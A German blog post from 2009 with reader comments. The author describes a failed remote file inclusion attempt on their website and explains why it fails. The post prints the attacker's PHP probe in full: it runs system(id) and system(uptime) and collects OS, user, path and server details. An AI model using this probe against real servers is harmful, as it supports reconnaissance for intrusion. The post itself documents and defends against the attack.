Was ein Hacker versucht…
… und warum es hier nicht klappt 
Grade in meinem Stattool gesehen, dass jmd versucht hat, über einen typischen Includelink (?page=link) eine Datei bei mir auf dem Webspace auszuführen (der Versuch war btw auf meiner statischen Page, nicht im WordPress…)
Hier der Inhalt der Datei:
<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "0wnW4y<br>";
exit;
?>
Leider leider leider kann man diesen Code und den Include aus mehreren Gründen bei mir vergessen…
1. gibt es bei mir keine $_GET["page"] und wenn es eine gäbe, würde diese gefiltert…
2. ein Teil der Befehle, welche oben ausgeführt werden, sind durch Nenad gesperrt
3. Short Open Tags? Klar, sowas werd ich verwenden… weil die so Zukunftsweisend sind und bei den nächsten php-Versionen noch vorhanden sein werden
Auf jeden Fall ging dieser Angriff ins Leere (bzw diese Angriffe, es waren 2 an der Zahl)… ich werde weiterhin ein Auge darauf haben… Ach ja, die Datei wurde von einer seriösen Seite aus includiert… soll ich die warnen?
So long, and thanks for all the fish (and fun mit dem “Hacking” )
30 März 2009 um 15:08
Es geht auch nicht, weil externe Includes nicht funktionieren. Das einzigEffektive was noch geht sind sql-injections, POST und Cookiemanipulation.
30 März 2009 um 15:12
Stimmt, an externen Verbot hab ich schon nich mehr gedacht… wobei… is ja eigentlich bei Punkt 2 dabei
30 März 2009 um 17:44
“Hacker”? Das waren wohl eher ein paar Script Kiddies oder?
02 April 2009 um 13:42
REQUEST, what the fuck is REQUEST